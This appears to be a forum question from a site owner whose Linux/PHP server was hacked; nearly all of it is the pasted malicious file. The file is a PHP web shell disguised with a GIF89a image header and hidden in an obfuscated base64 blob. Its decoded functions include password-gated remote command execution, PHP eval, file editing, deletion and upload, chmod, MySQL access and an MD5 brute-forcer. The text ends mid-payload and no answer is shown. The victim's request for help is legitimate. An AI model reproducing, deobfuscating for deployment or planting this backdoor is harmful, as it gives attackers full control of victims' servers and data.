# how protect server linux from encode shell

Tags: php, linux, decode

my site is hacked with this file ( i will put sours code for file shell)

```
GIF89a;
<?php $_F=__FILE__;$_X='Pz48P3BocA0KNXJyMnJfcjVwMnJ0NG5nKDApOyAvL0lmIHRoNXI1IDRzIDFuIDVycjJyLCB3NSdsbCBzaDJ3IDR0LCBrPw0KJHAxc3N3MnJkID0gIiI7IC8vIFkyMyBjMW4gcDN0IDEgbWRpIHN0cjRuZyBoNXI1IHQyMiwgZjJyIHBsMTRudDV4dCBwMXNzdzJyZHM6IG0xeCBvNiBjaDFycy4NCiRtNSA9IGIxczVuMW01KF9fRklMRV9fKTsNCiRjMjJrNDVuMW01ID0gInc0NTU1NTUiOw0KDQo0Zig0c3M1dCgkX1BPU1RbJ3Axc3MnXSkpIC8vSWYgdGg1IDNzNXIgbTFkNSAxIGwyZzRuIDF0dDVtcHQsICJwMXNzIiB3NGxsIGI1IHM1dCA1aD8NCnsNCiA0ZihzdHJsNW4oJHAxc3N3MnJkKSA9PSBvYSkgLy9JZiB0aDUgbDVuZ3RoIDJmIHRoNSBwMXNzdzJyZCA0cyBvYSBjaDFyMWN0NXJzLCB0aHI1MXQgNHQgMXMgMW4gbWRpLg0KIHsNCiAgJF9QT1NUWydwMXNzJ10gPSBtZGkoJF9QT1NUWydwMXNzJ10pOw0KIH0NCiA0ZigkX1BPU1RbJ3Axc3MnXSA9PSAkcDFzc3cycmQpDQogew0KICAgczV0YzIyazQ1KCRjMjJrNDVuMW01LCAkX1BPU1RbJ3Axc3MnXSwgdDRtNSgpK29lMDApOyAvL0l0J3MgMWxyNGdodCwgbDV0IGg1bSA0bg0KIH0NCiByNWwyMWQoKTsNCn0NCiANCjRmKCE1bXB0eSgkcDFzc3cycmQpICYmICE0c3M1dCgkX0NPT0tJRVskYzIyazQ1bjFtNV0pIDJyICgkX0NPT0tJRVskYzIyazQ1bjFtNV0gIT0gJHAxc3N3MnJkKSkNCnsNCiBsMmc0bigpOw0KIGQ0NSgpOw0KfQ0KLy8NCi8vRDIgbjJ0IGNyMnNzIHRoNHMgbDRuNSEgQWxsIGMyZDUgcGwxYzVkIDFmdDVyIHRoNHMgYmwyY2sgYzFuJ3QgYjUgNXg1YzN0NWQgdzR0aDIzdCBiNTRuZyBsMmdnNWQgNG4hDQovLw0KNGYoNHNzNXQoJF9HRVRbJ3AnXSkgJiYgJF9HRVRbJ3AnXSA9PSAibDJnMjN0IikNCnsNCnM1dGMyMms0NSAoJGMyMms0NW4xbTUsICIiLCB0NG01KCkgLSBvZTAwKTsNCnI1bDIxZCgpOw0KfQ0KNGYoNHNzNXQoJF9HRVRbJ2Q0ciddKSkNCnsNCiBjaGQ0cigkX0dFVFsnZDRyJ10pOw0KfQ0KDQokcDFnNXMgPSAxcnIxeSgNCiAnY21kJyA9PiAnRXg1YzN0NSBDMm1tMW5kJywNCiAnNXYxbCcgPT4gJ0V2MWwzMXQ1IFBIUCcsDQogJ215c3FsJyA9PiAnTXlTUUwgUTM1cnknLA0KICdjaG0yZCcgPT4gJ0NobTJkIEY0bDUnLA0KICdwaHA0bmYyJyA9PiAnUEhQNG5mMicsDQogJ21kaScgPT4gJ21kaSBjcjFjazVyJywNCiAnaDUxZDVycycgPT4gJ1NoMncgaDUxZDVycycsDQogJ2wyZzIzdCcgPT4gJ0wyZyAyM3QnDQopOw0KLy9UaDUgaDUxZDVyLCBsNGs1IDR0Pw0KJGg1MWQ1ciA9ICc8aHRtbD4NCjx0NHRsNT4nLmc1dDVudigiSFRUUF9IT1NUIikuJyB+IFNoNWxsIEk8L3Q0dGw1Pg0KPGg1MWQ+DQo8c3R5bDU+DQp0ZCB7DQogZjJudC1zNHo1OiA2YXB4OyANCiBmMm50LWYxbTRseTogdjVyZDFuMTsNCiBjMmwycjogI29vRkYwMDsNCiBiMWNrZ3IyM25kOiAjMDAwMDAwOw0KfQ0KI2Qgew0KIGIxY2tncjIzbmQ6ICMwMG8wMDA7DQp9DQojZiB7DQogYjFja2dyMjNuZDogIzAwb28wMDsNCn0NCiNzIHsNCiBiMWNrZ3IyM25kOiAjMDBlbzAwOw0KfQ0KI2Q6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvbzAwOw0KfQ0KI2Y6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvMDAwOw0KfQ0KcHI1IHsNCiBmMm50LXM0ejU6IDYwcHg7IA0KIGYybnQtZjFtNGx5OiB2NXJkMW4xOw0KIGMybDJyOiAjb29GRjAwOw0KfQ0KMTpoMnY1ciB7DQp0NXh0LWQ1YzJyMXQ0Mm46IG4ybjU7DQp9DQoNCjRucDN0LHQ1eHQxcjUxLHM1bDVjdCB7DQogYjJyZDVyLXQycC13NGR0aDogNnB4OyANCiBmMm50LXc1NGdodDogYjJsZDsgDQogYjJyZDVyLWw1ZnQtdzRkdGg6IDZweDsgDQogZjJudC1zNHo1OiA2MHB4OyANCiBiMnJkNXItbDVmdC1jMmwycjogI29vRkYwMDsgDQogYjFja2dyMjNuZDogIzAwMDAwMDsgDQogYjJyZDVyLWIydHQybS13NGR0aDogNnB4OyANCiBiMnJkNXItYjJ0dDJtLWMybDJyOiAjb29GRjAwOyANCiBjMmwycjogI29vRkYwMDsgDQogYjJyZDVyLXQycC1jMmwycjogI29vRkYwMDsgDQogZjJudC1mMW00bHk6IHY1cmQxbjE7IA0KIGIycmQ1ci1yNGdodC13NGR0aDogNnB4OyANCiBiMnJkNXItcjRnaHQtYzJsMnI6ICNvb0ZGMDA7DQp9DQpociB7DQpjMmwycjogI29vRkYwMDsNCmIxY2tncjIzbmQtYzJsMnI6ICNvb0ZGMDA7DQpoNTRnaHQ6IGlweDsNCn0NCjwvc3R5bDU+DQo8L2g1MWQ+DQo8YjJkeSBiZ2MybDJyPWJsMWNrIDFsNG5rPSIjb29DQzAwIiB2bDRuaz0iI29vOTkwMCIgbDRuaz0iI29vOTkwMCI+DQo8dDFibDUgdzRkdGg9NjAwJT48dGQgNGQ9Img1MWQ1ciIgdzRkdGg9NjAwJT4NCjxwIDFsNGduPXI0Z2h0PjxiPls8MSBocjVmPSJodHRwOi8vd3d3LnIyMnRzaDVsbC10NTFtLjRuZjIiPlIyMnRTaDVsbDwvMT5dICBbPDEgaHI1Zj0iJy4kbTUuJyI+SDJtNTwvMT5dICc7DQpmMnI1MWNoKCRwMWc1cyAxcyAkcDFnNSA9PiAkcDFnNV9uMW01KQ0Kew0KICRoNTFkNXIgLj0gJyBbPDEgaHI1Zj0iP3A9Jy4kcDFnNS4nJmQ0cj0nLnI1MWxwMXRoKCcuJykuJyI+Jy4kcDFnNV9uMW01Lic8LzE+XSAnOw0KfQ0KJGg1MWQ1ciAuPSAnPGJyPjxocj4nLnNoMndfZDRycygnLicpLic8L3RkPjx0cj48dGQ+JzsNCnByNG50ICRoNTFkNXI7DQokZjIydDVyID0gJzx0cj48dGQ+PGhyPjxjNW50NXI+JmMycHk7IDwxIGhyNWY9Imh0dHA6Ly93d3cuNHIybncxcjV6LjRuZjIiPklyMm48LzE+ICYgPDEgaHI1Zj0iaHR0cDovL3d3dy5yMjJ0c2g1bGwtdDUxbS40bmYyIj5SMjJ0U2g1bGwgUzVjM3I0dHkgR3IyM3A8LzE+PC9jNW50NXI+PC90ZD48L3QxYmw1PjwvYjJkeT48L2g1MWQ+PC9odG1sPic7DQoNCi8vDQovL1AxZzUgaDFuZGw0bmcNCi8vDQo0Zig0c3M1dCgkX1JFUVVFU1RbJ3AnXSkpDQp7DQogIHN3NHRjaCAoJF9SRVFVRVNUWydwJ10pIHsNCiAgIA0KICAgYzFzNSAnY21kJzogLy9SM24gYzJtbTFuZA0KICAgIA0KICAgIHByNG50ICI8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9Y21kJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkMybW0xbmQ6PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1jMm1tMW5kPjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV4NWMzdDVcIj48L2Yycm0+IjsNCiAgICAgNGYoNHNzNXQoJF9SRVFVRVNUWydjMm1tMW5kJ10pKQ0KICAgICB7DQogICAgICBwcjRudCAiPHByNT4iOw0KICAgICAgNXg1YzN0NV9jMm1tMW5kKGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCksJF9SRVFVRVNUWydjMm1tMW5kJ10pOyAvL1kyMyB3MW50IGZyNDVzIHc0dGggdGgxdD8NCiAgICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAnNWQ0dCc6IC8vRWQ0dCAxIGY0NQ0KICAgIDRmKDRzczV0KCRfUE9TVFsnNWQ0dGYycm0nXSkpDQogICAgew0KICAgICAkZiA9ICRfR0VUWydmNGw1J107DQogICAgICRmaCA9IGYycDVuKCRmLCAndycpIDJyIHByNG50ICJFcnIyciB3aDRsNSAycDVuNG5nIGY0bDUhIjsNCiAgICAgZndyNHQ1KCRmaCwgJF9QT1NUWyc1ZDR0ZjJybSddKSAyciBwcjRudCAiQzIzbGRuJ3QgczF2NSBmNGw1ISI7DQogICAgIGZjbDJzNSgkZmgpOw0KICAgIH0NCiAgICBwcjRudCAiRWQ0dDRuZyBmNGw1IDxiPiIuJF9HRVRbJ2Y0bDUnXS4iPC9iPiAoIi5wNXJtKCRfR0VUWydmNGw1J10pLiIpPGJyPjxicj48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9NWQ0dCZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjx0NXh0MXI1MSBjMmxzPTkwIHIyd3M9NmkgbjFtNT1cIjVkNHRmMnJtXCI+IjsNCiAgICANCiAgICA0ZihmNGw1XzV4NHN0cygkX0dFVFsnZjRsNSddKSkNCiAgICB7DQogICAgICRyZCA9IGY0bDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgIGYycjUxY2goJHJkIDFzICRsKQ0KICAgICB7DQogICAgICBwcjRudCBodG1sc3A1YzQxbGNoMXJzKCRsKTsNCiAgICAgfQ0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPC90NXh0MXI1MT48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJTMXY1XCI+PC9mMnJtPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnZDVsNXQ1JzogLy9ENWw1dDUgMSBmNGw1DQogICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIDRmKDNubDRuaygkX0dFVFsnZjRsNSddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgZDVsNXQ1ZCBzM2NjNXNzZjNsbHkuIjsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAgIHByNG50ICJDMjNsZG4ndCBkNWw1dDUgZjRsNS4iOw0KICAgICB9DQogICAgfQ0KICAgIA0KICAgIA0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pICYmIGY0bDVfNXg0c3RzKCRfR0VUWydmNGw1J10pICYmICE0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIHByNG50ICJBcjUgeTIzIHMzcjUgeTIzIHcxbnQgdDIgZDVsNXQ1ICIuJF9HRVRbJ2Y0bDUnXS4iPzxicj4NCiAgICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWQ1bDV0NSZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iXCIgbTV0aDJkPVBPU1Q+DQogICAgIDw0bnAzdCB0eXA1PWg0ZGQ1biBuMW01PXk1cyB2MWwzNT15NXM+DQogICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkQ1bDV0NVwiPg0KICAgICAiOw0KICAgIH0NCiAgIA0KICAgDQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICc1djFsJzogLy9FdjFsMzF0NSBQSFAgYzJkNQ0KICAgDQogICAgcHI0bnQgIjxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD01djFsXCIgbTV0aDJkPVBPU1Q+DQogICAgPHQ1eHQxcjUxIGMybHM9ZTAgcjJ3cz02MCBuMW01PVwiNXYxbFwiPiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWyc1djFsJ10pKQ0KICAgIHsNCiAgICAgcHI0bnQgaHRtbHNwNWM0MWxjaDFycygkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgIHByNG50ICJwcjRudCBcIlkyIE0ybW0xXCI7IjsNCiAgICB9DQogICAgcHI0bnQgIjwvdDV4dDFyNTE+PGJyPg0KICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV2MWxcIj4NCiAgICA8L2Yycm0+IjsNCiAgICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJzV2MWwnXSkpDQogICAgew0KICAgICBwcjRudCAiPGg2Pk8zdHAzdDo8L2g2PiI7DQogICAgIHByNG50ICI8YnI+IjsNCiAgICAgNXYxbCgkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnY2htMmQnOiAvL0NobTJkIGY0bDUNCiAgICANCiAgICANCiAgICBwcjRudCAiPGg2PlVuZDVyIGMybnN0cjNjdDQybiE8L2g2PiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWydjaG0yZCddKSkNCiAgICB7DQogICAgc3c0dGNoICgkX1BPU1RbJ2NodjFsMzUnXSl7DQogICAgIGMxczUgNzc3Og0KICAgICBjaG0yZCgkX1BPU1RbJ2NobTJkJ10sMDc3Nyk7DQogICAgIGJyNTFrOw0KICAgICBjMXM1IGV1dToNCiAgICAgY2htMmQoJF9QT1NUWydjaG0yZCddLDBldXUpOw0KICAgICBicjUxazsNCiAgICAgYzFzNSA3aWk6DQogICAgIGNobTJkKCRfUE9TVFsnY2htMmQnXSwwN2lpKTsNCiAgICAgYnI1MWs7DQogICAgfQ0KICAgIHByNG50ICJDaDFuZzVkIHA1cm00c3M0Mm5zIDJuICIuJF9QT1NUWydjaG0yZCddLiIgdDIgIi4kX1BPU1RbJ2NodjFsMzUnXS4iLiI7DQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGMybnQ1bnQgPSAzcmxkNWMyZDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgICRjMm50NW50ID0gImY0bDUvcDF0aC9wbDUxczUiOw0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWNobTJkJmY0bDU9Ii4kYzJudDVudC4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkY0bDUgdDIgY2htMmQ6DQogICAgPDRucDN0IHR5cDU9dDV4dCBuMW01PWNobTJkIHYxbDM1PVwiIi4kYzJudDVudC4iXCIgczR6NT03MD48YnI+PGI+TjV3IHA1cm00c3M0Mm46PC9iPg0KICAgIDxzNWw1Y3QgbjFtNT1cImNodjFsMzVcIj4NCjwycHQ0Mm4gdjFsMzU9XCI3NzdcIj43Nzc8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCJldXVcIj5ldXU8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCI3aWlcIj43aWk8LzJwdDQybj4NCjwvczVsNWN0Pjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkNoMW5nNVwiPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbXlzcWwnOiAvL015U1FMIFEzNXJ5DQogICANCiAgIDRmKDRzczV0KCRfUE9TVFsnaDJzdCddKSkNCiAgIHsNCiAgICAkbDRuayA9IG15c3FsX2Mybm41Y3QoJF9QT1NUWydoMnN0J10sICRfUE9TVFsnM3M1cm4xbTUnXSwgJF9QT1NUWydteXNxbHAxc3MnXSkgMnIgZDQ1KCdDMjNsZCBuMnQgYzJubjVjdDogJyAuIG15c3FsXzVycjJyKCkpOw0KICAgIG15c3FsX3M1bDVjdF9kYigkX1BPU1RbJ2RiMXM1J10pOw0KICAgICRzcWwgPSAkX1BPU1RbJ3EzNXJ5J107DQogICAgDQogICAgDQogICAgJHI1czNsdCA9IG15c3FsX3EzNXJ5KCRzcWwpOw0KICAgIA0KICAgfQ0KICAgNWxzNQ0KICAgew0KICAgIHByNG50ICINCiAgICBUaDRzIDJubHkgcTM1cjQ1cyB0aDUgZDF0MWIxczUsIGQyNXNuJ3QgcjV0M3JuIGQxdDEhPGJyPg0KICAgIDxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD1teXNxbFwiIG01dGgyZD1QT1NUPg0KICAgIDxiPkgyc3Q6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9aDJzdCB2MWwzNT1cImwyYzFsaDJzdFwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPlVzNXJuMW01Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9M3M1cm4xbTUgdjFsMzU9XCJyMjJ0XCIgczR6NT02MD48YnI+DQogICAgPGI+UDFzc3cycmQ6PGJyPjwvYj48NG5wM3QgdHlwNT1wMXNzdzJyZCBuMW01PW15c3FscDFzcyB2MWwzNT1cIlwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPkQxdDFiMXM1Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZGIxczUgdjFsMzU9XCJ0NXN0XCIgczR6NT02MD48YnI+DQogICAgDQogICAgPGI+UTM1cnk6PGJyPjwvYjx0NXh0MXI1MSBuMW01PXEzNXJ5PjwvdDV4dDFyNTE+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUTM1cnkgZDF0MWIxczVcIj4NCiAgICA8L2Yycm0+DQogICAgIjsNCiAgICANCiAgIH0NCiAgIA0KICAgYnI1MWs7DQogICANCiAgIGMxczUgJ2NyNTF0NWQ0cic6DQogICA0Zihta2Q0cigkX0dFVFsnY3JkNHInXSkpDQogICB7DQogICBwcjRudCAnRDRyNWN0MnJ5IGNyNTF0NWQgczNjYzVzc2YzbGx5Lic7DQogICB9DQogICA1bHM1DQogICB7DQogICBwcjRudCAnQzIzbGRuXCd0IGNyNTF0NSBkNHI1Y3QycnknOw0KICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAncGhwNG5mMic6IC8vUEhQIEluZjINCiAgICBwaHA0bmYyKCk7DQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICdyNW4xbTUnOg0KICAgDQogICAgNGYoNHNzNXQoJF9QT1NUWydmNGw1MmxkJ10pKQ0KICAgIHsNCiAgICAgNGYocjVuMW01KCRfUE9TVFsnZjRsNTJsZCddLCRfUE9TVFsnZjRsNW41dyddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgcjVuMW01ZC4iOw0KICAgICB9DQogICAgIDVsczUNCiAgICAgew0KICAgICAgcHI0bnQgIkMyM2xkbid0IHI1bjFtNSBmNGw1LiI7DQogICAgIH0NCiAgICAgDQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGY0bDUgPSBiMXM1bjFtNShodG1sc3A1YzQxbGNoMXJzKCRfR0VUWydmNGw1J10pKTsNCiAgICB9DQogICAgNWxzNQ0KICAgIHsNCiAgICAgJGY0bDUgPSAiIjsNCiAgICB9DQogICAgDQogICAgcHI0bnQgIlI1bjFtNG5nICIuJGY0bDUuIiA0biBmMmxkNXIgIi5yNTFscDF0aCgnLicpLiIuPGJyPg0KICAgICAgICA8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9cjVuMW01JmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPg0KICAgICA8Yj5SNW4xbTU6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZjRsNTJsZCB2MWwzNT1cIiIuJGY0bDUuIlwiIHM0ejU9NzA+PGJyPg0KICAgICA8Yj5UMjo8YnI+PDRucDN0IHR5cDU9dDV4dCBuMW01PWY0bDVuNXcgdjFsMzU9XCJcIiBzNHo1PTYwPjxicj4NCiAgICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUjVuMW01IGY0bDVcIj4NCiAgICAgPC9mMnJtPiI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbWRpJzoNCiAgIDRmKDRzczV0KCRfUE9TVFsnbWRpJ10pKQ0KICAgew0KICAgNGYoITRzX24zbTVyNGMoJF9QT1NUWyd0NG01bDRtNHQnXSkpDQogICB7DQogICAkX1BPU1RbJ3Q0bTVsNG00dCddID0gbzA7DQogICB9DQogICBzNXRfdDRtNV9sNG00dCgkX1BPU1RbJ3Q0bTVsNG00dCddKTsNCiAgICA0ZihzdHJsNW4oJF9QT1NUWydtZGknXSkgPT0gb2EpDQogICAgew0KICAgICANCiAgICAgIDRmKCRfUE9TVFsnY2gxcnMnXSA9PSAiOTk5OSIpDQogICAgICB7DQogICAgICAkNCA9IDA7DQogICAgICB3aDRsNSgkX1BPU1RbJ21kaSddICE9IG1kaSgkNCkgJiYgJDQgIT0gNjAwMDAwKQ0KICAgICAgIHsNCiAgICAgICAgJDQrKzsNCiAgICAgICB9DQogICAgICB9DQogICAgICA1bHM1DQogICAgICB7DQogICAgICAgZjJyKCQ0ID0gIjEiOyAkNCAhPSAienp6enoiOyAkNCsrKQ0KICAgICAgIHsNCiAgICAgICAgNGYobWRpKCQ0ID09ICRfUE9TVFsnbWRpJ10pKQ0KICAgICAgICB7DQogICAgICAgICBicjUxazsNCiAgICAgICAgfQ0KICAgICAgIH0NCiAgICAgIH0NCiAgICAgDQogICAgIDRmKG1kaSgkNCkgPT0gJF9QT1NUWydtZGknXSkNCiAgICAgew0KICAgICAgIHByNG50ICI8aDY+UGwxNG50NXh0IDJmICIuICRfUE9TVFsnbWRpJ10uICIgNHMgPDQ+Ii4kNC4iPC80PjwvaDY+PGJyPjxicj4iOw0KICAgICB9DQogICAgIA0KICAgIH0NCiAgICANCiAgIH0NCiAgIA0KICAgcHI0bnQgIlc0bGwgYnIzdDVmMnJjNSB0aDUgbWRpDQogICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPW1kaVwiIG01dGgyZD1QT1NUPg0KICAgIDxiPm1kaSB0MiBjcjFjazo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1tZGkgdjFsMzU9XCJcIiBzNHo1PXUwPjxicj4NCiAgICA8Yj5DaDFyMWN0NXJzOjwvYj48YnI+PHM1bDVjdCBuMW01PVwiY2gxcnNcIj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiMXpcIj4xIC0genp6eno8LzJwdDQybj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiOTk5OVwiPjYgLSA5OTk5OTk5PC8ycHQ0Mm4+DQogICAgPC9zNWw1Y3Q+DQogICAgPGI+TTF4LiBjcjFjazRuZyB0NG01Kjo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT10NG01bDRtNHQgdjFsMzU9XCJvMFwiIHM0ejU9YT48YnI+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQnIzdDVmMnJjNSBtZGlcIj4NCiAgICA8L2Yycm0+PGJyPio6IDRmIHM1dF90NG01X2w0bTR0IDRzIDFsbDJ3NWQgYnkgcGhwLjRuNCI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnaDUxZDVycyc6DQogICBmMnI1MWNoKGc1dDFsbGg1MWQ1cnMoKSAxcyAkaDUxZDVyID0+ICR2MWwzNSkNCiAgIHsNCiAgIHByNG50IGh0bWxzcDVjNDFsY2gxcnMoJGg1MWQ1ciAuICI6IiAuICR2MWwzNSkuIjxicj4iOw0KICAgDQogICB9DQogICBicjUxazsNCiAgfQ0KfQ0KNWxzNSAvL0Q1ZjEzbHQgcDFnNSB0aDF0IHc0bGwgYjUgc2gyd24gd2g1biB0aDUgcDFnNSA0c24ndCBmMjNuZCAyciBuMiBwMWc1IDRzIHM1bDVjdDVkLg0Kew0KIA0KICRmNGw1cyA9IDFycjF5KCk7DQogJGQ0cjVjdDJyNDVzID0gMXJyMXkoKTsNCiANCiA0Zig0c3M1dCgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsnbjFtNSddKSkNCnsNCiAkdDFyZzV0X3AxdGggPSByNTFscDF0aCgnLicpLicvJzsNCiAkdDFyZzV0X3AxdGggPSAkdDFyZzV0X3AxdGggLiBiMXM1bjFtNSggJF9GSUxFU1snM3BsMjFkNWRmNGw1J11bJ24xbTUnXSk7IA0KIDRmKG0ydjVfM3BsMjFkNWRfZjRsNSgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsndG1wX24xbTUnXSwgJHQxcmc1dF9wMXRoKSkgew0KICAgICBwcjRudCAiRjRsNToiLiAgYjFzNW4xbTUoICRfRklMRVNbJzNwbDIxZDVkZjRsNSddWyduMW01J10pLiANCiAgICAgIiBoMXMgYjU1biAzcGwyMWQ1ZCI7DQogfSA1bHM1ew0KICAgICA1Y2gyICJGNGw1IDNwbDIxZCBmMTRsNWQhIjsNCiB9DQp9DQoNCiANCiANCiANCiBwcjRudCAiPHQxYmw1IGIycmQ1cj0wIHc0ZHRoPTYwMCU+PHRkIHc0ZHRoPWklIDRkPXM+PGI+T3B0NDJuczwvYj48L3RkPjx0ZCA0ZD1zPjxiPkY0bDVuMW01PC9iPjwvdGQ+PHRkIDRkPXM+PGI+UzR6NTwvYj48L3RkPjx0ZCA0ZD1zPjxiPlA1cm00c3M0Mm5zPC9iPjwvdGQ+PHRkIDRkPXM+TDFzdCBtMmQ0ZjQ1ZDwvdGQ+PHRyPiI7DQogNGYgKCRoMW5kbDUgPSAycDVuZDRyKCcuJykpDQogew0KICB3aDRsNSAoZjFsczUgIT09ICgkZjRsNSA9IHI1MWRkNHIoJGgxbmRsNSkpKSANCiAgew0KICAgICAgICA0Zig0c19kNHIoJGY0bDUpKQ0KICAgICB7DQogICAgJGQ0cjVjdDJyNDVzW10gPSAkZjRsNTsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAkZjRsNXNbXSA9ICRmNGw1Ow0KICAgICB9DQogIH0NCiAxczJydCgkZDRyNWN0MnI0NXMpOw0KIDFzMnJ0KCRmNGw1cyk7DQogIGYycjUxY2goJGQ0cjVjdDJyNDVzIDFzICRmNGw1KQ0KICB7DQogICBwcjRudCAiPHRkIDRkPWQ+PDEgaHI1Zj1cIj9wPXI1bjFtNSZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiImZDRyPSIucjUxbHAxdGgoJy4nKS4iXCI+W1JdPC8xPjwxIGhyNWY9XCI/cD1kNWw1dDUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+W0RdPC8xPjwvdGQ+PHRkIDRkPWQ+PDEgaHI1Zj1cIiIuJG01LiI/ZDRyPSIucjUxbHAxdGgoJGY0bDUpLiJcIj4iLiRmNGw1LiI8LzE+PC90ZD48dGQgNGQ9ZD48L3RkPjx0ZCA0ZD1kPjwxIGhyNWY9XCI/cD1jaG0yZCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+PGYybnQgYzJsMnI9Ii5nNXRfYzJsMnIoJGY0bDUpLiI+Ii5wNXJtKCRmNGw1KS4iPC9mMm50PjwvMT48L3RkPjx0ZCA0ZD1kPiIuZDF0NSAoIlkvbS9kLCBIOjQ6cyIsIGY0bDVtdDRtNSgkZjRsNSkpLiI8L3RkPjx0cj4iOw0KICB9DQogIA0KICBmMnI1MWNoKCRmNGw1cyAxcyAkZjRsNSkNCiAgew0KICAgcHI0bnQgIjx0ZCA0ZD1mPjwxIGhyNWY9XCI/cD1yNW4xbTUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiPltSXTwvMT48MSBocjVmPVwiP3A9ZDVsNXQ1JmY0bDU9Ii5yNTFscDF0aCgkZjRsNSkuIlwiPltEXTwvMT48L3RkPjx0ZCA0ZD1mPjwxIGhyNWY9XCIiLiRtNS4iP3A9NWQ0dCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+Ii4kZjRsNS4iPC8xPjwvdGQ+PHRkIDRkPWY+Ii5mNGw1czR6NSgkZjRsNSkuIjwvdGQ+PHRkIDRkPWY+PDEgaHI1Zj1cIj9wPWNobTJkJmQ0cj0iLnI1MWxwMXRoKCcuJykuIiZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiJcIj48ZjJudCBjMmwycj0iLmc1dF9jMmwycigkZjRsNSkuIj4iLnA1cm0oJGY0bDUpLiI8L2YybnQ+PC8xPjwvdGQ+PHRkIDRkPWY+Ii5kMXQ1ICgiWS9tL2QsIEg6NDpzIiwgZjRsNW10NG01KCRmNGw1KSkuIjwvdGQ+PHRyPiI7DQogIH0NCiB9DQogNWxzNQ0KIHsNCiAgcHI0bnQgIjwzPkVycjJyITwvMz4gQzFuJ3QgMnA1biA8Yj4iLnI1MWxwMXRoKCcuJykuIjwvYj4hPGJyPiI7DQogfQ0KIA0KIHByNG50ICI8L3QxYmw1Pjxocj48dDFibDUgYjJyZDVyPTA